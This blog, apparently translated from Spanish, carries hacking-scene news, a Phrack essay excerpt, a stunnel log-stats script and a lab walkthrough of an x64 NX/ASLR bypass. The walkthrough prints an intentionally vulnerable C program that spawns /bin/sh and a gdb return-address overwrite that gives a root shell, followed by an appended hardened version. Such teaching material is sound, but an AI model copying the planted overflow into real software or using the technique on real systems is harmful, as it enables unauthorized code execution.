Curiosity is insubordination in its purest form. -Vladimir Nabokov

Thursday, 28 August 2014

hackstory.es book now available

Hi everyone, the book Hackstory.es, La historia nunca contada del underground hacker en la península Ibérica (the untold history of the hacker underground in the Iberian Peninsula), is now available. Congratulations to the author and to everyone else involved.

Saturday, 5 April 2014

Phrack news

Hi everyone,

The most respected ezine in this world is probably Phrack.

Well, Phrack is changing its content publication schedule for the better, and the change starts with The Fall of Hacker Groups.

That's all, have a nice day.

Sunday, 30 March 2014

Exploiting para niños [revised]

Hi Exploiters,

I've spent a few days revising a document that had lain dormant for far too long, and this is the result.

I know the approach may seem strange to some people, but that's the style I wanted to give it, and besides, the document's title gives me the perfect excuse to sit down and write without my own ignorance getting in the way; without false modesty, we are all ignorant of something.

I have tried to keep anything incorrect out of the text. As always, any comments on it are welcome.

I'm telling you nothing new if I say that, once the 90s were over, the world of exploiting has been strongly marked by the eternal cat-and-mouse game, and that so far the exploiters have kept the race exciting and have held their ground, always pushing the finish line forward.

Who knows whether someone will one day manage to nail the finish line down for good. For the common good of the fun, let's hope that day is a long way off.

Although, the way events are unfolding in the world, it seems less and less far-fetched to think that everything is going to blow up soon anyway; but before that happens let's enjoy ourselves, just in case, and if in the end it doesn't blow up, we will have had fun along the way. So, Exploiting para niños.

That's all for now, have a nice day.

Saturday, 24 August 2013

Privilege escalation in Debian and derivatives



More info: http://unaaldia.hispasec.com/2013/08/elevacion-de-privilegios-en-debian-y.html

Tuesday, 6 August 2013

Linux Heap Exploiting Revisited



Way to go, mr heap!

"what we're going to assume is... what happens if we could control the contents of the forward pointer and the backward pointer..."

From there on, the crème de la crème, my friend... Keep on rockin' and see you next time :)

Sunday, 16 June 2013

Basic UDP session Hijacking with Scapy

Ask him no questions he'll tell you no lies
That's why a rocker never dies
He's the rocker ♪♪

Monday, 8 April 2013

Happy Hacking

File: archives/68/p68_0x07_Happy Hacking_by_anonymous author.txt ==Phrack Inc.==

Volume 0x0e, Issue 0x44, Phile #0x07 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Happy Hacking ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ by Anonymous ]=---------------------------=|
|=-----------------------------------------------------------------------=|
--[ 3 - The Security Industry

In recent years I've seen how many hackers join the information security industry and many of them having the illusion that hacking as their day job will bring them a great deal of happiness. After a couple of years they discover they no longer enjoy hacking, that those feelings they used to have in the old days are no longer there, and they decide to blame the hacking scene, often condemning it as "being dead".

I'll try to explain this behavior from the science of happiness point of view.

Let me start by looking at Journalism. The science of happiness has shown that people are happy in a profession where:

- "Doing good (high quality work) matches with doing well (achieving wealth and professional advancement) in the field." -

Journalism is one of those careers where doing good (making the world better by promoting democracy and free press) doesn't usually lead to rising as a journalist. Julian Assange, the chief editor of Wikileaks, is a pretty obvious example of this. By firmly believing in free press he has brought upon himself a great deal of trouble. In contrast, being manipulative and exaggerating news often leads to selling more news, which in turn allows for the sales of more ads, which correlates to doing well. But by doing so, journalists have to compromise their beliefs, which ultimately makes their happiness levels go down. Those who decide not to compromise feel angry at their profession when they see those who cheat and compromise rise high. This feeling also leads their happiness levels to drop. Journalism is therefore one of those professions where its practitioners tend to be the most unhappy.

Hacking on the other hand doesn't suffer from this issue. In the hacking scene doing great work is often recognized and admired. Those hackers that are able to write that exploit thought to be impossible, or find that unbelievably complex vulnerability, are recognized and praised by the community. Also, many hackers tend to develop great tools which are often released as open source. The open source community shares a lot of properties with the hacking community. It is not hard to see why people enjoy developing open source projects so much. Most open source projects are community organizations led by meritocracy, where the best programmers can quickly escalate the ranks by writing great code. Furthermore, the idea of making the code and the underlying designs widely available gives participants a feeling of fulfillment as they are not doing this for profit but to contribute to a better world. These ideals have also been an integral part of the hacking community where one of its mottos is, "Knowledge should be free, information should be free". Being part of such communities brings a wealth of happiness, and is the reason why these communities flourished without the need for any economic incentives.

Recent years however have brought the security industry closer to the hacking industry. Many hacking scene members have become security industry members once their responsibilities demanded more money (e.g. married with kids and a mortgage). For them it seemed like the right fit and the perfect job was to hack for a living.

However, the security industry does not have the same properties as the hacking or open source communities. The security industry is much more like the journalism industry.

The main difference between the hacking community and the security industry is about the consumers of the security industry. While in the hacking community the consumers are hackers themselves, in the security industry the consumers are companies and other entities that don't have the same behavior as hackers. The behavior of the security industry consumers is similar to the behavior of the consumers of journalism. This is because these companies are partially a subset of the consumers of journalism. These consumers do not judge work as hackers do; instead they are more ignorant and have a different set of criteria to judge work quality.

Saturday, 23 February 2013

Tonel - basic stats&checks for stunnel

A script that extracts statistics about POP/IMAP connections tunneled through stunnel.

This script does primitive tasks that always get repeated from one script to the next: log parsing, error handling, regexps, etc. etc., so if anyone wants to contribute better ways of doing things... oh wait, perl XD, it is welcome.

Sample output HERE

Happy coding!!

#!/bin/bash
# script to get some useful POP/IMAP stats

# mktemp needs a template ending in X's; temp files are removed by cleanup() on exit/signal
TMPLOGFILE=$(mktemp -t stunnel.log.XXXXXX)
TMPIPT_LOGFILE=$(mktemp -t iptables.log.XXXXXX)
cleanup() {
  [ -f "$TMPLOGFILE" ] && rm -f "$TMPLOGFILE"
  [ -f "$TMPIPT_LOGFILE" ] && rm -f "$TMPIPT_LOGFILE"
  trap 0
  exit
}
trap cleanup 0 1 2 3 15

warn () {
  echo -e "$@"
}

die() {
  RC=$1 ; shift
  warn "$@"
  exit $RC
}

BANNER="Tonel ~ Basic stats&checks for stunnel / vlan7"
MY_NAME=${0##*/} #ie: tonel.sh
LOGFILE=/var/log/stunnel.log
#ROOT_UID=0
VERBOSE=0
IPT_PREFIX="POP/IMAP FLOOD"
IPT_LOGFILE=/var/log/iptables.log
BANNED_DBFILE=/proc/net/ipt_recent/BANNED
#FLOODERS_DBFILE=/proc/net/ipt_recent/FLOOD
# Defaults so the totals print as 0 when the iptables log or the ban db is missing
FLOODERS_TOTAL=0
BANNED_TOTAL=0

TODAY=$(date +%u)

if [ $TODAY -eq 1 ]
then
# Today is Monday
  BEGIN_DATE="$(date -dmonday-7days +%Y.%m.%d)"
  END_DATE="$(date -dmonday +%Y.%m.%d)"
  WRITE_END_DATE="$(date -dmonday-1day +%Y.%m.%d)"  #dirty hack

  BEGIN_IPT_DATE="$(date -dmonday-7days +"%b %e")"
  END_IPT_DATE="$(date -dmonday +"%b %e")"
  WRITE_END_IPT_DATE="$(date -dmonday-1day +"%b %e")"  #dirty hack
else
  BEGIN_DATE="$(date -dlast-monday-7days +%Y.%m.%d)"
  END_DATE="$(date -dlast-monday +%Y.%m.%d)"
  WRITE_END_DATE="$(date -dlast-monday-1day +%Y.%m.%d)"  #dirty hack

  BEGIN_IPT_DATE="$(date -dlast-monday-7days +"%b %e")"
  END_IPT_DATE="$(date -dlast-monday +"%b %e")"
  WRITE_END_IPT_DATE="$(date -dlast-monday-1day +"%b %e")"  #dirty hack
fi

# Run as root, of course.
#[ "$UID" -eq "$ROOT_UID" ] || die 1 "Bad luck, only root can run this code!"

echo -e "$BANNER"

# Parse arguments
while getopts "vhHf:d:" opt; do
  case $opt in
    v)
      echo -e "\n[+] -v detected. Ok, let's verbose!"
      VERBOSE=1
      ;;
    h)
      echo -e "\n-v verbose output"
      echo -e "\n-f <logfile> specify your stunnel logfile DEFAULT=$LOGFILE"
      echo -e "\n-d <YYYYMMDD+DAYS> (Up to 9999 days) (DEFAULT=one week ago starting last monday)"
      echo -e "\n-h Welcome to help"
      echo -e "\n-H Help: Long description"
      exit
      ;;
    H)
      echo -e "\nEl script acepta varios switches. Esto es la ayuda larga. La ayuda corta es -h"
      echo -e "\nEsta desarrollado de tal forma que sin ningun parametro, calcula estadisticas de toda la semana anterior a la que nos encontramos. Es totalmente transparente al dia actual, sea lunes, jueves, domingo o cualquier dia."
      echo -e "\nEs decir, si estamos en cualquier dia de la semana del 4 al 10-2-2013, asi calcula estadisticas del 28-1-2013 al 3-2-2013, ambos inclusive:"
      echo -e "\n\tbash $MY_NAME"
      echo -e "\nSi necesitamos especificar rangos seria:"
      echo -e "\n\tbash $MY_NAME -d 20130114+15"
      echo -e "\nAsi calcularia desde 20130114 hasta 20130129, ambos inclusive"
      echo -e "\nSi deseamos especificar el archivo de log de stunnel (por defecto $LOGFILE), el script permite que le pasemos el switch -f seguido del archivo de log deseado."
      echo -e "\nSi deseamos mas nivel de Verbose, podemos pasar al script el parametro -v"
      exit
      ;;
    f)
      echo -e "\n[+] -f detected so logfile is now $OPTARG"
      LOGFILE=$OPTARG
      ;;
    d)
      DATE=${OPTARG:0:8}
      INC_OR_DEC=${OPTARG:8:1}
      DAYS=${OPTARG:9:4}
      DAYS=${DAYS:-0}   # no day count given means a single day

      # Basic parse of -d argument
      # Valid $DATE basic regexp!
      [[ $DATE =~ ^[1-9][0-9][0-9][0-9](0[1-9]|1[012])(0[1-9]|[12][0-9]|3[01]) ]] || die 2 "ERROR! $DATE date detected. Must be YYYYMMDD format! Exiting now..."
      # $INC_OR_DEC Only + implemented
      [ "$INC_OR_DEC" == "+" ] || die 3 "ERROR! $INC_OR_DEC inc_char detected. Must be +"

      BEGIN_DATE="$(date -d $DATE +%Y.%m.%d)"
      END_DATE="$(date -d $DATE$INC_OR_DEC$((DAYS + 1))"days" +%Y.%m.%d)"
      WRITE_END_DATE="$(date -d $DATE$INC_OR_DEC$DAYS"days" +%Y.%m.%d)"   #dirty hack

      BEGIN_IPT_DATE="$(date -d $DATE +"%b %e")"
      END_IPT_DATE="$(date -d $DATE$INC_OR_DEC$((DAYS + 1))"days" +"%b %e")"
      WRITE_END_IPT_DATE="$(date -d $DATE$INC_OR_DEC$DAYS"days" +"%b %e")"  #dirty hack

# DEBUG line-
#     echo "#DATE#$DATE#INC_ORD_DEC#$INC_OR_DEC#DAYS#$DAYS#BEGIN_DATE#$BEGIN_DATE#END_DATE#$END_DATE#WRITE_END_DATE#$WRITE_END_DATE#BEGIN_IPT_DATE#$BEGIN_IPT_DATE#END_IPT_DATE#$END_IPT_DATE#WRITE_END_IPT_DATE#$WRITE_END_IPT_DATE<<EOL"
      echo -e "\n[+] -d detected so date range is now\n\t[from $BEGIN_DATE to $WRITE_END_DATE]"
      ;;
  esac
done

[ -f "$LOGFILE" ] && echo -e "\n[+] Log $LOGFILE starts on $(head -n 1 "$LOGFILE" |cut -d" " -f1,2)"
[ -f "$IPT_LOGFILE" ] && echo -e "\n[+] Log $IPT_LOGFILE starts on $(head -n 1 "$IPT_LOGFILE" |awk '{print $1,$2,$3}')"

echo -e "\n\t\t\t[+] [+] Now running some basic checks..."
echo -e "\t\t\t======================================"
echo -e "\n[+] Checking runnin' stunnel processes..."
ps -ef |grep '[s]tunnel' |grep -v "$MY_NAME" || die 4 "ERROR! stunnel is NOT running! Exiting now..."
echo -e "\n\t[OK!] Let's continue..."

echo -e "\n[+] Checking stunnel LISTEN sockets..."
##netstat -tnl |grep LISTEN |egrep ':110|:143|:993|:995'
##lsof -iTCP:143 -iTCP:110 -iTCP:993 -iTCP:995
lsof -iTCP:143 |grep LISTEN || die 5 "ERROR! IMAP is NOT listening! Exiting now..."
lsof -iTCP:110 |grep LISTEN || die 6 "ERROR! POP3 is NOT listening! Exiting now..."
lsof -iTCP:993 |grep LISTEN || die 7 "ERROR! IMAPS is NOT listening! Exiting now..."
lsof -iTCP:995 |grep LISTEN || die 8 "ERROR! POP3S is NOT listening! Exiting now..."

echo -e "\n\t[OK!] Let's continue..."

echo -e "\n\t\t\t[+] [+] Now parsing logfile [$LOGFILE] ..."
echo -e "\t\t\t==========================================="
[ -f "$LOGFILE" ] || die 9 "Fatal ERROR! log $LOGFILE NOT found. Exiting now..."

#BUFFER=$(awk '{ if ( $0 > "'"$BEGIN_DATE"'" && $0 < "'"$END_DATE"'" ) print $0 }' $LOGFILE)
#echo "$BUFFER"  # note the "" to respect \n chars

awk '{ if ( $0 > "'"$BEGIN_DATE"'" && $0 < "'"$END_DATE"'" ) print $0 }' "$LOGFILE" >"$TMPLOGFILE"
OUTAGES=$(egrep -c "Received signal| stunnel " "$TMPLOGFILE")
echo -e "\n[+] stunnel outages [from $BEGIN_DATE to $WRITE_END_DATE]: [$OUTAGES]"
[ $OUTAGES -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Daemon stops:\n\t\t$(grep "Received signal" "$TMPLOGFILE")"
[ $OUTAGES -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Daemon starts:\n\t\t$(grep " stunnel " "$TMPLOGFILE")"

core() {
  echo -e "\n[+] Numero conexiones $1 OK / IP origen: [from $BEGIN_DATE to $WRITE_END_DATE]"
  CORE_TOTAL=$(grep -c "$1 connected from" $TMPLOGFILE)
  [ $CORE_TOTAL -ne 0 ] && grep "$1 connected from" $TMPLOGFILE |cut -d" " -f7 |cut -d":" -f1 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
  echo -e "\n\t[+] Total conexiones: [$CORE_TOTAL]"
  [ $CORE_TOTAL -ne 0 ] && [ $VERBOSE -ne 0 ] && echo -e "\t[+] Primera conexion:\n\t\t$(grep "$1 connected from" $TMPLOGFILE |head -n 1 |cut -d" " -f1,2,4-7)"
  [ $CORE_TOTAL -ne 0 ] && echo -e "\t[+] Ultima conexion:\n\t\t$(grep "$1 connected from" $TMPLOGFILE |tail -n 1 |cut -d" " -f1,2,4-7)"
}

CONNS_TOTAL=0
core "IMAP" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "POP3" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "IMAPS" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
core "POP3S" ; CONNS_TOTAL=$(($CONNS_TOTAL+$CORE_TOTAL))
echo -e "\n[+] Total conexiones (IMAP && POP3 && IMAPS && POP3S): [$CONNS_TOTAL]"

echo -e "\n\t\t\t[+] [+] Now checking bad guys..."
echo -e "\t\t\t===================================="

# Code below relies on Wietse's TCP-Wrappers
echo -e "\n[+] NO autorizados: Conexiones rechazadas / IP origen [from $BEGIN_DATE to $WRITE_END_DATE]"
REFUSED_TOTAL=$(grep -c "REFUSED" $TMPLOGFILE)
[ $REFUSED_TOTAL -ne 0 ] && grep REFUSED $TMPLOGFILE |cut -d" " -f6 |cut -d":" -f1 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
echo -e "\n\t[+] Total conexiones rechazadas (NO autorizados): [$REFUSED_TOTAL]\n"

# Code below relies on some anti-DoS custom iptables rules
echo -e "\n[+] POP/IMAP FLOODERS: Conexiones rechazadas / IP origen [from $BEGIN_IPT_DATE to $WRITE_END_IPT_DATE]"
[ -f $IPT_LOGFILE ] || warn "[!] WARNING! $IPT_LOGFILE NOT found! Skipping this test and continuing anyway..."
[ -f $IPT_LOGFILE ] && awk '{ if ( $0 > "'"$BEGIN_IPT_DATE"'" && $0 < "'"$END_IPT_DATE"'" ) print $0 }' $IPT_LOGFILE >$TMPIPT_LOGFILE
[ -f $IPT_LOGFILE ] && FLOODERS_TOTAL=$(grep -c "$IPT_PREFIX" $TMPIPT_LOGFILE)
[ -f $IPT_LOGFILE ] && [ $FLOODERS_TOTAL -ne 0 ] && grep "$IPT_PREFIX" $TMPIPT_LOGFILE |grep -Eo "SRC=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" |cut -d= -f2 |sort |uniq -c |sort -rn |sed -e 's/^[ ]*//' |awk '{print NR, $0}' |tr ' ' \\t
echo -e "\n\t[+] Total conexiones rechazadas (FLOODERS): [$FLOODERS_TOTAL]\n"

echo -e "\n[+] FLOODERS actualmente BANEADOS [dbfile $BANNED_DBFILE]"
[ -f $BANNED_DBFILE ] || warn "[!] WARNING! $BANNED_DBFILE NOT found! Skipping this test and continuing anyway..."
[ -f $BANNED_DBFILE ] && BANNED_TOTAL=$(wc -l < "$BANNED_DBFILE")
[ -f $BANNED_DBFILE ] && [ $BANNED_TOTAL -ne 0 ] && cut -d" " -f1 $BANNED_DBFILE |cut -d= -f2
echo -e "\n\t[+] Total IPs actualmente BANEADAS: [$BANNED_TOTAL]\n"

PATH_TO_ME=${0}
FULL_ARGS=${@}
echo -e "\nLast run on $(hostname) at $(date) with\n$PATH_TO_ME $FULL_ARGS\nNow exiting - Have a nice day...\n"
[ $VERBOSE -eq 0 ] && echo -e "Do you wanna verbose output? just rerun me with -v switch!\n"

exit 0

Tuesday, 5 February 2013

RootedCON 2013 speaker list published

Saturday, 9 March
16:30 - 17:20 Albert López
Linux Heap Exploiting Revisited

et al.

Talks and speakers.

We're all pioneers. And we're all surrounded by heroes -Joe Barr

Saturday, 26 January 2013

Ventanas with the Guardia Civil's Grupo de delitos telemáticos (Telematic Crimes Group)

A pretty decent radio interview with the GDT, to get to know them a bit better.

Tuesday, 22 January 2013

NX/ASLR linux/x64 bypass

Hi Exploiters,

For a while I'd been wanting to write about how an overflow can let us (with no shellcodes!) move through a program's code paths (intended or not), and after reading this excellent post on ROP I finally got going.

Covering ROP is outside my original idea, so here are things like: NX doesn't matter if we want to divert the program's flow towards, for example, a function belonging to the program being exploited itself, so we can end up executing parts of the program we shouldn't (wrong password? no problem, just let me in anyway).

It is an exploitation on a 64-bit Linux system with a recent kernel blah blah blah, and as you'll see there are conditions under which ASLR has no effect at all (no infoleaks needed, no bruteforce needed... as if it didn't exist). Enjoy.

### Some versions
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

### 64 bits S.O.
root@bt:~# getconf LONG_BIT
64

### Full ASLR
root@bt:~# cat /proc/sys/kernel/randomize_va_space 
2

### ASLR + NX
root@bt:~# bash checksec.sh --file vuln
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   vuln

### Code
root@bt:~# cat vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
// gcc -o vuln vuln.c -fno-stack-protector -mpreferred-stack-boundary=4  #4 is min on x64
 
void nunca_se_ejecuta()
/* NUNCA SE LLAMA A ESTA FUNCION EN EL CODIGO */
/* call me if you can */
{
 system("/bin/sh");
 printf("SIGSEGV");
}
 
void vuln(char *buff)
{
 char tmp[8] = {'\0'};
 
 strcpy(tmp, buff);
 printf("-> %s\n", tmp);
}
 
int main(int argc, char *argv[])
{
 if(argc != 2) {
  printf("%s <arg>\n", argv[0]);
  exit(0);
 }
 printf("exploit me if you can");
 
 vuln(argv[1]);
 return 0;
}

### No SSP. Min preferred stack boundary on x64 is 4 bytes
root@bt:~# gcc -o vuln vuln.c -fno-stack-protector -mpreferred-stack-boundary=4

### Okay, let's GDB rocks:
root@bt:~# gdb -q vuln
Reading symbols from /root/vuln...(no debugging symbols found)...done.
(gdb) r `perl -e 'print "123456789012345678901234AAAA"'`
Starting program: /root/vuln `perl -e 'print "123456789012345678901234AAAA"'`

Program received signal SIGSEGV, Segmentation fault.
0x0000000041414141 in ?? ()

### The Segmentation fault is what we wanted to see. Let's disasm our target func
(gdb) disas nunca_se_ejecuta
Dump of assembler code for function nunca_se_ejecuta:
   0x0000000000400604 <+0>: push   %rbp
   0x0000000000400605 <+1>: mov    %rsp,%rbp
   0x0000000000400608 <+4>: mov    $0x4007c0,%edi
   0x000000000040060d <+9>: callq  0x4004f8 <system@plt>
   0x0000000000400612 <+14>: mov    $0x4007c8,%eax
   0x0000000000400617 <+19>: mov    %rax,%rdi
   0x000000000040061a <+22>: mov    $0x0,%eax
   0x000000000040061f <+27>: callq  0x4004c8 <printf@plt>
   0x0000000000400624 <+32>: leaveq 
   0x0000000000400625 <+33>: retq   
End of assembler dump.

### If we want to get into the function that is never called, we can jump here:
0x0000000000400608 <+4>: mov    $0x4007c0,%edi
Lots of NULLs? No problem: in 64-bit addressing we can reach that memory address by jumping to 0x00400608. Still one null byte that would abort the program? tsk tsk, little-endian to the rescue:
(gdb) r `perl -e 'print "123456789012345678901234\x08\x06\x40\x00"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /root/vuln `perl -e 'print "123456789012345678901234\x08\x06\x40\x00"'`
sh-4.1# whoami
root
:)
sh-4.1# exit

Program received signal SIGSEGV, Segmentation fault.
0x00007fffffffe4a8 in ?? ()

## bye
(gdb) q
A debugging session is active.

 Inferior 1 [process 20741] will be killed.

Quit anyway? (y or n) y
root@bt:~#
Tested on a 4.1.7-grsec kernel: system() still returns a shell to us, and once we exit the shell, when we return from the function, PaX kills the exploited program.

Have fun-
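As an added example (not the post's own code), here is the post's vuln() routine next to a bounds-checked replacement, so the defect and its fix sit side by side. The names would_overflow, vuln_safe and safe_copy_matches are this example's own; TMP_SIZE mirrors the tmp[8] buffer in the post's vuln.c, and the inputs in main() are constructed, including the 28-byte string used in the post's gdb run.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Size of the tmp[] buffer in the post's vuln(). */
#define TMP_SIZE 8

/* Returns 1 if strcpy(tmp, buff) into an 8-byte tmp[] would write past the
 * end of the buffer (the condition the post's overflow depends on), else 0.
 * strcpy copies strlen(buff) bytes plus the terminating NUL, so anything
 * longer than 7 characters runs into the saved frame above tmp[]. */
int would_overflow(const char *buff)
{
    return strlen(buff) + 1 > TMP_SIZE;
}

/* Hardened replacement for the post's vuln(): copies at most outsz-1 bytes,
 * always NUL-terminates, and reports truncation instead of corrupting the
 * stack. Returns 1 if the input was truncated, 0 otherwise. */
int vuln_safe(const char *buff, char *out, size_t outsz)
{
    if (outsz == 0)
        return 1;
    /* snprintf returns the length the full output would have had, so a
     * return value >= outsz means the input did not fit. */
    int n = snprintf(out, outsz, "%s", buff);
    return n < 0 || (size_t)n >= outsz;
}

/* Helper for checking results: copies `in` through vuln_safe() into an
 * 8-byte buffer and returns 1 if the result equals `expected`. */
int safe_copy_matches(const char *in, const char *expected)
{
    char tmp[TMP_SIZE];
    vuln_safe(in, tmp, sizeof tmp);
    return strcmp(tmp, expected) == 0;
}

int main(int argc, char *argv[])
{
    /* Constructed inputs: the 28-byte string from the post's gdb run, and a
     * short one that fits. */
    const char *inputs[] = { "123456789012345678901234AAAA", "abc" };
    char tmp[TMP_SIZE];

    (void)argc; (void)argv;
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int trunc = vuln_safe(inputs[i], tmp, sizeof tmp);
        printf("len %zu: would_overflow=%d safe copy=\"%s\" truncated=%d\n",
               strlen(inputs[i]), would_overflow(inputs[i]), tmp, trunc);
    }
    return 0;
}
```

The bounded copy removes the write past tmp[]; the build flags the post turned off close the rest of the path it relies on. Compiling with -fstack-protector-strong restores the canary that -fno-stack-protector removed, -fPIE -pie makes the binary's own code subject to ASLR (checksec reported "No PIE", which is why 0x400608 was a fixed address), and with -O2 -D_FORTIFY_SOURCE=2 glibc's checked strcpy aborts at runtime when the destination size is known at compile time, as it is for tmp[8].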